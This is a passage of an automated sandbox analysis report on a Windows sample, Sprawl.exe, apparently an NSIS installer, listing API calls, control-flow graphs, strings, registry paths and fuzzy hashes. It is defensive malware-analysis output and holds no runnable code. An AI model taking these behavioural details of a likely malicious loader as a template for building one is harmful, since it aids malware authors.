                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                                                            • API String ID: 2200240437-4240819195
                                                                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                            • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                            • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 871 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 878 4023b0-4023b8 871->878 879 4028cf-4028de 871->879 880 4023c8-4023cb 878->880 881 4023ba-4023c7 call 402a3a lstrlenA 878->881 884 4023db-4023de 880->884 885 4023cd-4023da call 402a1d 880->885 881->880 889 4023e0-4023ea call 402e9f 884->889 890 4023ef-402403 RegSetValueExA 884->890 885->884 889->890 891 402405 890->891 892 402408-4024de RegCloseKey 890->892 891->892 892->879
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                            • lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                                            • String ID: Arabisation\argumenta\dekaderne
                                                                                                                            • API String ID: 1356686001-2217045471
                                                                                                                            • Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                                                            • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                                            • Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                                                            • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 896 4059d1-4059db 897 4059dc-405a07 GetTickCount GetTempFileNameA 896->897 898 405a16-405a18 897->898 899 405a09-405a0b 897->899 901 405a10-405a13 898->901 899->897 900 405a0d 899->900 900->901
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                                            Strings
                                                                                                                            • "C:\Users\user\Desktop\Sprawl.exe", xrefs: 004059D1
                                                                                                                            • nsa, xrefs: 004059DC
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                            • API String ID: 1716503409-4130506415
                                                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                            • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                            • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 902 401bca-401be2 call 402a1d * 2 907 401be4-401beb call 402a3a 902->907 908 401bee-401bf2 902->908 907->908 910 401bf4-401bfb call 402a3a 908->910 911 401bfe-401c04 908->911 910->911 913 401c06-401c1a call 402a1d * 2 911->913 914 401c4a-401c70 call 402a3a * 2 FindWindowExA 911->914 925 401c3a-401c48 SendMessageA 913->925 926 401c1c-401c38 SendMessageTimeoutA 913->926 927 401c76 914->927 925->927 928 401c79-401c7c 926->928 927->928 929 401c82 928->929 930 4028cf-4028de 928->930 929->930
                                                                                                                            APIs
                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                            • String ID: !
                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                            • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                                            • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                                                            • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                                            • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
                                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2987980305-0
                                                                                                                            • Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                                                            • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                                            • Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                                                            • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                              • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,000000F0), ref: 00401634
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00401629
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                                                            • API String ID: 1892508949-1369816015
                                                                                                                            • Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                                                            • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                                            • Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                                                            • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Vulkanbyernes Setup,NSIS Error), ref: 00405D3C
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                            • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                                            • GetFileAttributesA.KERNELBASE(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 3248276644-3936084776
                                                                                                                            • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                            • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                                            • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                            • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(00020410,00000000,00000000,00000000), ref: 00403F72
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                            • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                                            • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                                                            • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                                            • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                                            Strings
                                                                                                                            • Error launching installer, xrefs: 004054D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                            • String ID: Error launching installer
                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                            • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                                            • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                                                            • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                                            • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
                                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                              • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                                              • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3521207402-0
                                                                                                                            • Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                                                            • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                                                            • Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                                                            • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
